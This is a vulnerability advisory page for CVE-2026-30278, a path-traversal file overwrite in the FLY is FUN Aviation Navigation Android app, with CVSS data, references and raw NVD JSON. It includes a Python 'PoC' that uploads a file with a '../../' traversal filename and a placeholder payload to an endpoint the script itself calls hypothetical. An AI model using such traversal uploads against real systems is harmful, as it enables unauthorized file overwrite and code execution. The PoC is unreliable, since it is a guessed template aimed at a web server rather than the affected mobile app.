CVE-2026-30278

Description

An arbitrary file overwrite vulnerability in FLY is FUN Aviation Navigation v35.33 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:funair:fly_is_fun:35.33:*:*:*:*:android:*:* - VULNERABLE

FLY is FUN Aviation Navigation v35.33

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Hypothetical endpoint based on vulnerability description)
target_url = "http://target-server.com/api/import"

# Malicious file content intended to overwrite a critical file
# e.g., overwriting a configuration file or a script
malicious_content = b"MALICIOUS_CODE_PAYLOAD"

# The target internal file path to overwrite (Path Traversal)
filename = "../../../../../path/to/critical/system_file.dat"

# Construct the multipart form data
files = {
    'file': (filename, malicious_content, 'application/octet-stream')
}

try:
    # Sending the request without authentication (PR:N)
    response = requests.post(target_url, files=files, timeout=10)
    
    if response.status_code == 200:
        print("[+] Exploit successful! File may have been overwritten.")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30278
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30278
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30278/
[4] VulDB https://vuldb.com/cve/CVE-2026-30278
[5] http://fly.com
[6] http://www.funair.cz/forum
[7] https://secsys.fudan.edu.cn/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30278", "sourceIdentifier": "[email protected]", "published": "2026-03-31T18:16:46.863", "lastModified": "2026-04-06T15:01:01.663", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file overwrite vulnerability in FLY is FUN Aviation Navigation v35.33 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:funair:fly_is_fun:35.33:*:*:*:*:android:*:*", "matchCriteriaId": "4A2B2AEC-BDA4-4CC0-916E-7681801A15F2"}]}]}], "references": [{"url": "http://fly.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "http://www.funair.cz/forum", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://secsys.fudan.edu.cn/", "source": "[email protected]", "tags": ["Not Applicable"]}]}}